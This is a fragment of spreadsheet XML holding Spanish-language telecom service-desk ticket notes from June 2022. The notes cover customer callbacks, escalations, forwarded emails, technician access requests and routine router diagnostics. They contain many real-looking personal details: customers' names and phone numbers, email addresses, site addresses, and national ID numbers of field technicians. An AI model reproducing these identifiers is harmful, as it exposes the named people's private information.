JONATHAN EDUARDO TEZEN MEJIA
BUENA  TARDE ,
FAVOR RE PROGRAMAR  VISITA   PARA MAÑANA SÁBADO 18/06/2022 /  ENTRE 08:00  A 10:00
FAVOR CONFIRMAR  HORARIO
TÉCNICOS:
DUI CODIGO EMPLEADO
HECTOR IVAN  DUI 04339969-2</t>
  </si>
  <si>
    <t>F4604256</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BRENDA GONZALES 78728526  MENCIONA QUE SE QUEDE LA VISITA PROGRAMADA PARA MAÑANA A LAS  9:00 HRS
-ID 3001623096</t>
  </si>
  <si>
    <t>F4604259</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ÁLVARO EFRAÍN HERRERA  70739113 MENCIONA QUE NO TIENE COMUNICACION CON PR, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001625771</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ÁLVARO EFRAÍN HERRERA RODRÍGUEZ AL 2594-1158 INDICA QUE ACABA DE RESP0ONDER EL CORREO YA QUE AUN HAY PROBLEMA DE CONFIGURACION YA QUE NO SE PUEDE LLEGAR A LOS EQUIPOS CONFIGURADOS DEL OTRO LADO DEL ENLACE || SE NOTIFICA A GESTOR **
-ID 1001181170
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ÁLVARO EFRAÍN HERRERA RODRÍGUEZ AL 2594-1158 INDICA QUE SI RECIBIO CORREO PERO EL DIA DE HOY ES FERIADO POR EL DIA DEL PADRE NO LABORAN HASTA EL DIA LUNES ENTONCES EL DIA LUNES REALIZARA PRUEBAS CON SU COMPAÑERO TAMBIEN Y NOS ESTARA RESPONDIENDO EL CORREO**
-ID 3001789217
**</t>
  </si>
  <si>
    <t>F4604276</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24151048  CONTESTA EL SEÑOR JORGE PERO NO ATIENDE LLAMADA DEJA EN ESPERA Y NO RETOMA LLAMADA || SE INTENTARA LUEGO**
-ID 3001605322
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE HARÁN PRUEBAS CON CLIENTE MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HECTOR CUEVAS AL 51170500  INDICA QUE ESTA EN UNA REUNION SOLICITA QUE SE LE LLAME AL PR
AL NUMERO 24151048 **
-ID 3001604210
**</t>
  </si>
  <si>
    <t>F4604287</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE, ALEX NAJERA, INDICA QUE HACE DOS SEMANAS LLEGO AL AL SITIO Y QUE AUN NO ESTA FAMILIARIZADO CON EL PROCESO CUANDO SE TIENE INCONVENINTE A NIVEL INTERNO, SE CONTACTARA A TECNICO: ERICK SANCHEZ, +502 3484 0142, PARA PARA SOLICITAR MAS DETALLES DE LA AFECTACION
NÚMERO: 7753
FIN: HOY, 14:12
ID DE LLAMADA: 3001599069</t>
  </si>
  <si>
    <t>F4604290</t>
  </si>
  <si>
    <t>SE LLAMA A LA CENTRAL PARA VALIDAR COMO OBSERVAN EL SERVICIO PERO NO RESPONDEN, SE INTENTARA LUEGO
A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
-ID 3001633346</t>
  </si>
  <si>
    <t>SE PERDIO LA COMUNICACION CON CLIENT SR. SKARLET MANZANERO SE REGRESA LA LLAMADA PERO YA NO CONTESTA...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. SKARLET MANZANERO 41753805 ...</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A SKARLET MANZANERO/CLIENTE INDICA QUE PERSISTE LO REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELÉFONO APOYA MARLON RAMOS/GESTOR; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4604291</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 9:32
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; JARGUETA@DSASTORS.COM &lt;JARGUETA@DSASTORS.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS ID1276020SV || ATILISA S.A. DE C.V. || SAN LUIS TALPAAEROPUERTO INT. COMALAPAAREA DE SERV.MULTIPLES0LOCAL
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE:   FELIX FRANCISCO CAMPOS GOMEZ
NUEMRO DE DUI:       04136613-0
NOMBRE: ROBERTO SALOMON RIVAS ZELEDON
NUEMRO DE DUI:01341394-5
NOMBRE:JOSE ARMANDO DE LA CRUZ ORTIZ
NUEMRO DE DUI:00415138-2
NOMBRE: MIGUEL ANGEL CONSTANZA ALVARADO
NUEMRO DE DUI:01809731-2
NOMBRE:CARLOS ALBERTO LOPEZ MONTOYA
NUEMRO DE DUI:01238332-5
NOMBRE:ROBERTO CARLOS PORTALES SALINAS
NUEMRO DE DUI:00709008-0
NOMBRE:SALVADOR ISRAEL LANDAVERDE VASQUEZ
NUEMRO DE DUI:03262257-9
NOMBRE:RICARDO ADALBERTO CRUZ RODRIGUEZ
NUEMRO DE DUI:05206587-8
NOMBRE:JUAN PABLO LOPEZ ALFARO
NUEMRO DE DUI: 01543781-4
HERRAMIENTAS:
MAQUINA FUSIONADORA
KIT DE HERRAMIENTAS MANUALES DE FUSIONADORA.
KIT OTDR.
ESCALERAS DE DOS BANDAS DE 24'' Y TIPO A
CONOS DE SEGURIDAD
BARRAS DELIMITADORAS DE SEGURIDAD
TENAZA KLEIN
CUCHILLA
TENAZA CORTE DIAGONAL
DESARMADORES
BARRA OCHAVADA
BARRA DE UÑA
LAMPARA KLEIN
CASCOS DE PROTECCION
ARNES DE SEGURIDAD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JAIME ARGUETA 78032835 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001112271</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME ARGUETA 78032835 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001700434 - 3001700675</t>
  </si>
  <si>
    <t>F4604293</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A KARLA GÁLVEZ/EJECUTIVO CLARO, SE LE INDICA ENLACE OK, SE HABLARÁ CON CLIENTE; SE LLAMÓ/HABLÓ CON LUIS VELÁSQUEZ/CLIENTE 47018525 SE LE INDICA ENLACE OK, ÉSTE PIDE SE LE LLAME EN 15 MINUTOS PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4604295</t>
  </si>
  <si>
    <t>SE INGRESA AL ETX 1 EN DONDE ESTAN CONECTADOS TODOS LOS SERVICIOS, SEGUN CLIENTE INDICA QUE SON PBX DIFERENTES LOS E1, SE VALIDA QUE HAY CONECTADO EN EL PUERTO 6 EN DONDE NO ESTA CONFIGURADA LA VLAN DE TELEFONIA, SE AGREGA VLAN AL PUERTO EN EL ETX1 Y EL SERVICIO RESTABLECE, SE LLAMA AL GDN REPORTADO 24012400 Y LA LLAMADA COMPLETA, EL SEGUIMIENTO DE LA FALLA SE DIO CON F4604298
&lt;OSONSVZ0N1D1EID1&gt;DISP IP ROU VPN IP_PBX 10.165.214.6
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : IP_PBX
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.165.214.6/32  DIRECT  0    0                 0.0.0.0         VLANIF3093
&lt;OSONSVZ0N1D1EID1&gt;PING -VPN IP_PBX 10.165.214.6
  PING 10.165.214.6: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.165.214.6: BYTES=56 SEQUENCE=1 TTL=64 TIME=1 MS
    REPLY FROM 10.165.214.6: BYTES=56 SEQUENCE=2 TTL=64 TIME=1 MS
    REPLY FROM 10.165.214.6: BYTES=56 SEQUENCE=3 TTL=64 TIME=1 MS
    REPLY FROM 10.165.214.6: BYTES=56 SEQUENCE=4 TTL=64 TIME=1 MS
    REPLY FROM 10.165.214.6: BYTES=56 SEQUENCE=5 TTL=64 TIME=1 MS
  --- 10.165.214.6 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;OSONSVZ0N1D1EID1&gt;
ID1099123&gt;CONFIG&gt;PORT# SHOW SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           UP       DOWN      100000000
ETHERNET       3              ETH-3           UP       UP        100000000
ETHERNET       4              ETH-4           UP       UP        100000000
ETHERNET       5              ETH-5           UP       UP        100000000
ETHERNET       6              ETH-6           UP       UP        100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
ID1099123&gt;CONFIG&gt;PORT#
  PORT 6
            PVID 3093 PRIORITY 5
            SPANNING-TREE
                NO SHUTDOWN
            EXIT
VLAN ID : 3093  NAME  : 24455300SV
TAGGED PORTS   : 1
UNTAGGED PORTS : 5..6</t>
  </si>
  <si>
    <t>REPORTE CLIENTE NO CUENTA CON SERVICIO
CAUSA RAIZ CLIENTE SE EQUIVOCO DEL SERVICIO REPORTABA OTRO E1
QUE SE REALIZO CLIENTE MICHELL COMENTA QUE EL E1 QUE NO LE ESTA FUNCIONANDO ES 24012400 Y EL E1 CON EL GDN 24455300 SI LE FUNCIONA, NO SE REALIZO NINGUNA INTERVENCION TECNICA CON EL E1 24455300  YA QUE ESTABA OPERATIVO, CON EL 24012400 SE DIO SEGUIMIENTO F4604298, CLIENTE NOS CONFIRMA QUE EL 24455300 ESTA OPERATIVO Y NOS AUTORIZA EL CIERRE DE CASO</t>
  </si>
  <si>
    <t>F4604299</t>
  </si>
  <si>
    <t>CLIENTE MELVIN SANDOVAL LLAMA DEL 55556944 ID 3001600682 PARA EL SEGUIMIENTO DEL CASO SD1135754 SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS SE TRANSFIERE CON EL GESTOR A CARGO LUIS.IXCOT AL 8126 ID 3001601162 INGRESA LA LLAMADA CON EL GESTOR Y NO RESPONDE SE DERIVA LA LLAMADA A MIGUEL RODRIGUEZ NO RESPONDE SE DERIVA A WAGNER POLANCO QUIEN COMENTA QUE BRINDARA EL APOYO Y SE DEJA CON EL CL EN LINEA A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4604302</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRANDON RIOS 41285757 MENCIONA QUE NO CUENTA CON SALIDA A INTERNET
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001629085</t>
  </si>
  <si>
    <t>SE HABLÓ CON BRANDON RÍOS/CLIENTE 41285757 PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA CONTINUAR CON SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>F4604318</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO VALTODANO  8988-4602 INDICA QUE YA ESTA EN SITIO SOLICITA REALIZAR PRUEBAS || SE  CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001732811 3001734524
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO VALTODANO  89884602 MENCIONA QUE NO LLEGA A LA IP PUBLICA  23.22.130.173
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001644672</t>
  </si>
  <si>
    <t>F4604321</t>
  </si>
  <si>
    <t>**SE  LLAMA A CLIENTE MELVIN CHACON AL 23049696  EXT. 1 OPC 01 CONTESTA LA SEÑORITA  NATALY CRUZ SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00 AM Y QUE TENDRAN EL TICKET EN OBSERVACION  **
-ID 3001641893
**</t>
  </si>
  <si>
    <t>F4604326</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JIMMY AVELDAÑO ROSALES AL 506 88995384  INFORMA QUE NO HA RECIBIDO NINGUN CORREO SOLICITA QUE SE LE REENVIE Y QUE SE COPIE AL CORREO AVENDARJ@GMAIL.COM || SE NOTIFICA A GESTOR **
-ID 3001639258
**</t>
  </si>
  <si>
    <t>F4604327</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE.
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SE SOLICITA DE SU APOYO PARA EL INGRESO A SUS INSTALACIONES PARA REVISIÓN DEL E1 TELEFÓNICO
22052626 DE GRUPO GESTAR UBICADO EN LA DIRECCIÓN 6 AVENIDA 3-95 ZONA 10.
PARA EL DÍA DE MAÑANA A PARTIR DE LAS 7:00AM, PARA LOS SIGUIENTES POSIBLES</t>
  </si>
  <si>
    <t>F4604340</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIELA RAMOS AL 35193540 INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001627965 - 3001628214
**</t>
  </si>
  <si>
    <t>F4604343</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON GABRIELA RAMOS/CLIENTE 35193540 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4604344</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JONATHAN VALLEJO A QUIEN SE LE SOLICITO REALIZAR PRUEBAS DE LLAMADAS SALIENTES CON LAS DEMAS EXTENSIONES Y TAMBIEN REINCIAR LA PBX. CLIENTE SOLICITA LLAMADA EN 30MIN.
3001601134
COLA:
NOMBRE: A: 0050494379469
NÚMERO: 0050494379469
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050494379469
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 14:08:15</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATAN VALLEJO-94379469  INDICA QUE EL REPORTE ES QUE EL  HA HABILITADO UN DID  22837305  PERO SALE CON SU PRINCIPAL----## INDICA QUE ESE ES EL REPORTE EN SI-
###LLAMADAS ENTRENTES TODO OK
###LLAMAAS SALIENTES TODO OK
##VIVO</t>
  </si>
  <si>
    <t>F4604350</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CARACUN AL 30726797 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001633428
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE --
RE: SEGUIMIENTO 890600002T || BANCO CITIBANK DE GUATEMALA</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 12:12
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ERICK ESTUARDO ROSAL ARTEAGA &lt;ERICK.ROSAL@BANCOPROMERICA.COM.GT&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; WALTER MOISES AROCHE CIFUENTES &lt;WALTER.AROCHE@BANCOPROMERICA.COM.GT&gt;; SOPORTE OPERACIONES IT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TELECOMUNICACIONES &lt;TELECOMUNICACIONES@BANCOPROMERICA.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO 890600002T || BANCO CITIBANK DE GUATEMALA
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS CARACUN 30726797 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001653982</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A WALTER AROCHE/CENTRAL SE LE INDICA ENLACE OK, ÉSTE INDICA QUE LO VE DOWN; SE LE PIDE APOYO CON TELS ADICIONALES, ME BRINDA EL 30622227 HILDA MORENO/PR; SE TIENE EN LÍNEA A ÉSTA; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, SE LES LLAMÓ HASTA 4 VECES, NO CONTESTAN. NO SE TUVO APOYO DE GESTIÓN N1, SE ESCALA CON KEVYN FONSECA/TEAM LEADER INDICA QUE VERIFICARÁ.</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE CARLOS CARACUN 30726797 NO RESPONDE, SEINTENTARA LUEGO
-ID 3001646384</t>
  </si>
  <si>
    <t>F4604355</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS ALBERTO COJON 59228964  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001798435
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS ALBERTO COJON 59228964  MENCIONA QUE HAY PERSONAL DE CLARO EN PR VERIFICANDO EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001784413</t>
  </si>
  <si>
    <t>SE HABLÓ CON WILMAR VILLATORO/CLIENTE 59228890 PIDE SE LE LLAME MAÑANA A LAS 06:00AM PARA SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILMAR VILATORRO - 59228890 SE TRATA DE EXPLICAR QUE EL INCONVENIENTE ES EN EL UPS Y ES NECESARIO QUE LO PUEDAN SOLVENTAR PERO CLIENTE INSISTE EN QUE EL PROBLEMA NO ES EL UPS
-ID 3001758742</t>
  </si>
  <si>
    <t>F4604381</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, RESPONDE EVELYN, INDICA QUE SE LE LLAME A  LUIS PÉREZ CABRERA A LOS OTROS NUMEROS DISPONIBLES
3001627806
COLA:
NOMBRE: A: 22562435
NÚMERO: 22562435
DURACIÓN: 0:00:47
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22562435
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 15:35:19</t>
  </si>
  <si>
    <t>F4604395</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YASMIN AL 54197370 CONTESTAN PERO INDICAN QUE ES NUMERO EQUIVOCADO **
-ID 3001630613 - 3001630792
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAVIER GOMEZ AL 47409087 INDICA QUE AUN NO CUENTA CON INTERNET NO SE PUEDE CONECTAR NI POR CABLE NI VIA WIFI INFORMA TAMBIEN QUE YA SE REINICIO EL EQUIPO PERO NO LEVANTA CLIENTE INDICA QUE AYER PASO LO MISMO CON OTRA SUCURSAL Y ERA PROBLEMA DEL ROUTER SOLICITA VISITA Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 9:00 A 18:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR LISTADO DEL PERSONAL TEC AL CORREO LORTIZ@OMNISPORT.COM
DIRECCION: 12 CALLE 0-85 ZONA 9 LOCAL 1 PLAZA SAN LORENZO
ATENDERA EN SITIO: YASMIN 54196370
-ID 3001631487
**</t>
  </si>
  <si>
    <t>F4604402</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS ZAMORA/CLIENTE 57247219 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30130082 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001722431</t>
  </si>
  <si>
    <t>F4604406</t>
  </si>
  <si>
    <t>SE HABLÓ CON SERGIO GARCÍA/CLIENTE 00 525551745299 SE LE INDICA QUE ENLACE OK, ÉSTE PIDE SE LE ENVÍE PRUEBAS DONDE DEL LADO NUESTRO TODO BIEN, PARA ASÍ AUTORIZAR EL CIERRE DEL TICKET. SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4604426</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN CONTESTA SR MAX REYES- E INIDCA QUE DESDE ULTIMA INTERVENCION NO HA TENIDO PROBLEMAS DE LLAMDAS##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ZOILA APARICIO  78562355 - 78440347 PARA INDICARLE QUE SU NUMERO FUE PORTADO HOY A TIGO Y YA NO ES CLARO## DEBE DE DAR SEGUIMIENTO CON EL OTRO OPERADOR##
SE HA LLAMADO A CLIENTE 3 VECES##ENVIA A BUZON## SE PASA CASO A PC ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, PEDRO SÁNCHEZ-78440347    Y LA PERSONA QUE CONTESTA SE LLAMA ROBERTO 78440347, COMENTA QUE SERVICIO SE OBSERVA ACTIVO PERO EL PORBLEMA QUE REPORTA ES QUE DESDE ALGUNOS NUMEROS NO LE ENTRAN LA LLAMADA ## CLIENTE PIDE APOYO A SÑRITA ZOILA PARICIO -78562355 CON QUIEN APOYA ESCASAMENTE PARA REALIZAR PRUEBAS E INDICA QUE HA DETECTADO QUE DESDE CUALQUIER NUMERO DE TIGO NO COMMPLETA LLAMADAD, SE REALIZAN PRUEBAS CON NUMERO DE TIGO Y NO COMPLETA + SE REALIZAN PRUEBAS DESDE UN TELEFONO DE CLARO Y TAMPOCO COMPLETAN ## VIVO</t>
  </si>
  <si>
    <t>F4604442</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 17:21
PARA: JOSUÉ GABRIEL &lt;JOSUE.GABRIEL@IUNGO.CO&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: JAVIER SANCHEZ &lt;JAVIER.SANCHEZ@IUNGO.CO&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; VICTOR DIAZ &lt;VICTOR.DIAZ@IUNGO.CO&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SERGIO MORENO &lt;SERGIO.MORENO@IUNGO.CO&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; MAYNOR MARROQUIN &lt;MAYNOR.MARROQUIN@CLARO.COM.GT&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;; MARIO ALBERTO TRABANINO IXCOT &lt;MARIO.TRABANINO@CLARO.COM.GT&gt;; FRANCISCO AROLDO VELA ESTRADA &lt;FRANCISCO.VELA@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMAS CON ENLACE DE INTERNET
BUENA TARDE
   EN SEGUIMIENTO AL TICKET SD1135788 SOLICITAMOS NOS PUEDA CONFIRMAR SI REALIZARON LAS PRUEBAS DE PRIMER NIVEL EN PUNTO REMOTO Y DE SER ASÍ PODER CONFIRMARNOS LOS SIGUIENTES DATOS POR FAVOR.
DIRECCION EXACTA:
CONTACTO EN SITIO:
HORARIO DE ATENCION:
GESTIÓN DE PERMISOS:
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>F4604455</t>
  </si>
  <si>
    <t>LUEGO DE REINICIAR LA PBX LAS LLAMADAS YA INGRESAR AL IVR, PERO EL CLIENTE AL LEVANTAR EL TELEFONO LA LLAMADA NO SE CONTESTA. SE REALIZAN PRUEBAS CON EL VEEX Y LAS LLAMADAS SÍ  SE CONTESTAN, CLIENTE DEBE VERIFICAR LA PBX CON SU PROVEEDOR. SE REALIZARON PRUEBAS CON CLIENTE ELMER MORALES</t>
  </si>
  <si>
    <t>F4604458</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001649133
**</t>
  </si>
  <si>
    <t>F4604462</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JONATHAN GARCIA QUIEN ESTA APOYANDO A REVISAR EQUIPOS.
3001635188
COLA:
NOMBRE: A: 34343038
NÚMERO: 011 50234343038
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: +50234343038
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 15:57:30</t>
  </si>
  <si>
    <t>SE HABLÓ CON JONATHAN GARCÍA/CLIENTE 34343038 SE LE PIDE APOYO EN CONTESTAR EL CORREO AUTORIZANDO EL INGRESO DE TÉCNICO, INDICA QUE RESPONDERÁ A LA BREVEDAD.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE CON LOS DATOS DEL TECNICO
BUENAS TARDES,
ESTIMADOS SU APOYO CON EL PERMISO PARA EL TECNICO:
JUAN JOSÉ RODRÍGUEZ PAZ DPI 2494 43260 0208.
PARA REVISIÓN DEL E1 TELEFÓNICO 22699100.
QUEDO A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4604467</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RICARDO MARCIANO AL 70804942 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001761361
**</t>
  </si>
  <si>
    <t>F4604469</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DELMA CORTES  89783972 MENCIONA QUE EL SERVICIO HA PRESENTADO DEMASIADA INTERMITENCIA, SE LE INDICA A CLIENTE QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
SE LE MENCIONA A CLIENTE QUE SE ENVIARAN PRUEBAS POR CORREO
DELMACORTES@GRUPOAZUL-HN.COM
-ID 3001635252</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 17:03
PARA: DELMACORTES@GRUPOAZUL-HN.COM &lt;DELMACORTES@GRUPOAZUL-HN.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;
ASUNTO: GRUPO AZUL || 1393326OH || SD1135797
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
-NO SE OBSERVAN CAIDAS A NIVEL WAN O LAN
-SE OBSERVA CONSUMO
-SE TIENE SALIDA A INTERNET
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DELMA CORTES  89783972 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001702548
**</t>
  </si>
  <si>
    <t>F4604472</t>
  </si>
  <si>
    <t>SE LLAMA A EDWIN PAREDES SE LLAMA AL NUMERO 54105405  ##   3 VECES ##ENVIA A BUZON ## VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OMAR GUERRA-42642146  SE TIENE EN LINEA ##</t>
  </si>
  <si>
    <t>F4604483</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN TORRES AL 30413468  CLIENTE EN SITIO SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 3001649785
**</t>
  </si>
  <si>
    <t>F4604489</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ABIMAEL GUTIERREZ AL 42122724 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001763893
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ABIMAEL GUTIERREZ AL 42122724 / 34340380 NO RESPONDE EN NINGUN NUMERO ||
SE INTENTARA LUEGO **
-ID 3001749276- 3001749276
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ABIMAEL GUTIERREZ AL 42122724 INDICA QUE AUNH SE ENCUENTRA EN SITIO PARA REALIZAR PRUEBAS SE NOTIFICA A GESTOR **
-ID 3001650997
**</t>
  </si>
  <si>
